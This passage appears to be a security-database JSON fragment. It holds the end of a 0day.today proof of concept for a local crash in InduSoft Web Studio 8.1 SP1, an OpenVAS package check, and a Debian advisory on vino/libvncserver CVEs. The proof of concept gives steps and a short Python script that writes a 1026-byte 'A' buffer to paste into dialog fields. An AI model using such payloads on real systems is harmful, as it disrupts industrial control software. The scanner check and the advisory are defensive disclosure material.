\"Atributos\" 'No Redibujar'/'Deshabilitados' Denial of Service (PoC)\r\n# Discovery by: chuyreds\r\n# Google Dork: [email\u00a0protected]: chuyreds\r\n# Discovery Date: 23-11-2019\r\n# Vendor Homepage: http://www.indusoft.com/\r\n# Software Link : http://www.indusoft.com/Products-Downloads\r\n# Tested Version: 8.1 SP1\r\n# Vulnerability Type: Denial of Service (DoS) Local\r\n# Tested on OS: Windows 10 Pro x64 es\r\n\r\n# Steps to Produce the Denial of Service: \r\n# 1.- Run python code: InduSoft Web Studio Edition 8.1 SP1.py\r\n# 2.- Open InduSoft \"Web Studio Edition 8.1 SP1.txt\" and copy content to clipboard\r\n# 3.- Open InduSoft Web Studio Edition 8.1 SP1\r\n# 4.- On Graficos slect Atributos\r\n# 5.- Paste ClipBoard on \"No Redibujar\"/\"Deshabilitados\" and click on \"Aceptar\"\r\n\r\n\r\n#!/usr/bin/env python\r\n\r\nbuffer = \"\\x41\" * 1026\r\nf = open (\"InduSoft Web Studio Edition 8.1 SP1.txt\", \"w\")\r\nf.write(buffer)\r\nf.close()\n\n# 0day.today [2019-12-03] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/33593"}], "openvas": [{"lastseen": "2019-12-04T15:52:38", "bulletinFamily": "scanner", "description": "The remote host is missing an update for the ", "modified": "2019-11-30T00:00:00", "published": "2019-11-30T00:00:00", "id": "OPENVAS:1361412562310892014", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310892014", "title": "Debian LTS Advisory ([SECURITY] [DLA 2014-1] vino security update)", "type": "openvas", "sourceData": "# Copyright (C) 2019 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.892014\");\n script_version(\"2019-11-30T03:00:09+0000\");\n script_cve_id(\"CVE-2014-6053\", \"CVE-2018-7225\", \"CVE-2019-15681\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2019-11-30 03:00:09 +0000 (Sat, 30 Nov 2019)\");\n script_tag(name:\"creation_date\", value:\"2019-11-30 03:00:09 +0000 (Sat, 30 Nov 2019)\");\n script_name(\"Debian LTS Advisory ([SECURITY] [DLA 2014-1] vino security update)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2019 Greenbone Networks GmbH\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\", re:\"ssh/login/release=DEB8\");\n\n script_xref(name:\"URL\", value:\"https://lists.debian.org/debian-lts-announce/2019/11/msg00032.html\");\n script_xref(name:\"URL\", value:\"https://security-tracker.debian.org/tracker/DLA-2014-1\");\n script_xref(name:\"URL\", value:\"https://bugs.debian.org/945784\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'vino'\n package(s) announced via the DSA-2014-1 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Several vulnerabilities have been identified in the VNC code of vino, a\ndesktop sharing utility for the GNOME desktop environment.\n\nThe vulnerabilities referenced below are issues that have originally been\nreported against Debian source package libvncserver. The vino source\npackage in Debian ships a custom-patched and stripped down variant of\nlibvncserver, thus some of libvncserver's security fixes required porting\nover.\n\nCVE-2014-6053\n\nThe rfbProcessClientNormalMessage function in\nlibvncserver/rfbserver.c in LibVNCServer did not properly handle\nattempts to send a large amount of ClientCutText data, which allowed\nremote attackers to cause a denial of service (memory consumption or\ndaemon crash) via a crafted message that was processed by using a\nsingle unchecked malloc.\n\nCVE-2018-7225\n\nAn issue was discovered in LibVNCServer.\nrfbProcessClientNormalMessage() in rfbserver.c did not sanitize\nmsg.cct.length, leading to access to uninitialized and potentially\nsensitive data or possibly unspecified other impact (e.g., an integer\noverflow) via specially crafted VNC packets.\n\nCVE-2019-15681\n\nLibVNC contained a memory leak (CWE-655) in VNC server code, which\nallowed an attacker to read stack memory and could be abused for\ninformation disclosure. Combined with another vulnerability, it could\nbe used to leak stack memory and bypass ASLR. This attack appeared to\nbe exploitable via network connectivity.\");\n\n script_tag(name:\"affected\", value:\"'vino' package(s) on Debian Linux.\");\n\n script_tag(name:\"solution\", value:\"For Debian 8 'Jessie', these problems have been fixed in version\n3.14.0-2+deb8u1.\n\nWe recommend that you upgrade your vino packages.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif(!isnull(res = isdpkgvuln(pkg:\"vino\", ver:\"3.14.0-2+deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if(__pkg_match) {\n exit(99);\n}\n\nexit(0);", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "debian": [{"lastseen": "2019-11-29T22:14:35", "bulletinFamily": "unix", "description": "Package : vino\nVersion : 3.14.0-2+deb8u1\nCVE ID : CVE-2014-6053 CVE-2018-7225 CVE-2019-15681\nDebian Bug : 945784\n\n\nSeveral vulnerabilities have been identified in the VNC code of vino, a\ndesktop sharing utility for the GNOME desktop environment.\n\nThe vulnerabilities referenced below are issues that have originally been\nreported against Debian source package libvncserver. The vino source\npackage in Debian ships a custom-patched and stripped down variant of\nlibvncserver, thus some of libvncserver's security fixes required porting\nover.\n\nCVE-2014-6053\n\n The rfbProcessClientNormalMessage function in\n libvncserver/rfbserver.c in LibVNCServer did not properly handle\n attempts to send a large amount of ClientCutText data, which allowed\n remote attackers to cause a denial of service (memory consumption or\n daemon crash) via a crafted message that was processed by using a\n single unchecked malloc.\n\nCVE-2018-7225\n\n An issue was discovered in LibVNCServer.\n rfbProcessClientNormalMessage() in rfbserver.c did not sanitize\n msg.cct.length, leading to access to uninitialized and potentially\n sensitive data or possibly unspecified other impact (e.g., an integer\n overflow) via specially crafted VNC packets.\n\nCVE-2019-15681\n\n LibVNC contained a memory leak (CWE-655) in VNC server code, which\n allowed an attacker to read stack memory and could be abused for\n information disclosure. Combined with another vulnerability, it could\n be used to leak stack memory and bypass ASLR. This attack appeared to\n be exploitable via network connectivity.\n\n\nFor Debian 8 "Jessie", these problems have been fixed in version\n3.14.0-2+deb8u1.\n\nWe recommend that you upgrade your vino packages.\n\nFurther information about Debian LTS security advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://wiki.debian.org/LTS\n\n-- \n\nmike gabriel aka sunweaver (Debian Developer)\nfon: +49 (1520) 1976 148\n\nGnuPG Fingerprint: 9BFB AEE8 6C0A A5FF BF22 0782 9AF4 6B30 2577 1B31\nmail: sunweaver@debian.org, http://sunweavers.net\n", "modified": "2019-11-29T08:31:28", "published": "2019-11-29T08:31:28", "id": "DEBIAN:DLA-2014-1:AEDFD", "href": "https://lists.debian.org/debian-lts-announce/2019/debian-lts-announce-201911/msg00032.html", "title": "[SECURITY] [DLA 2014-1] vino security update", "type": "debian", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}]}
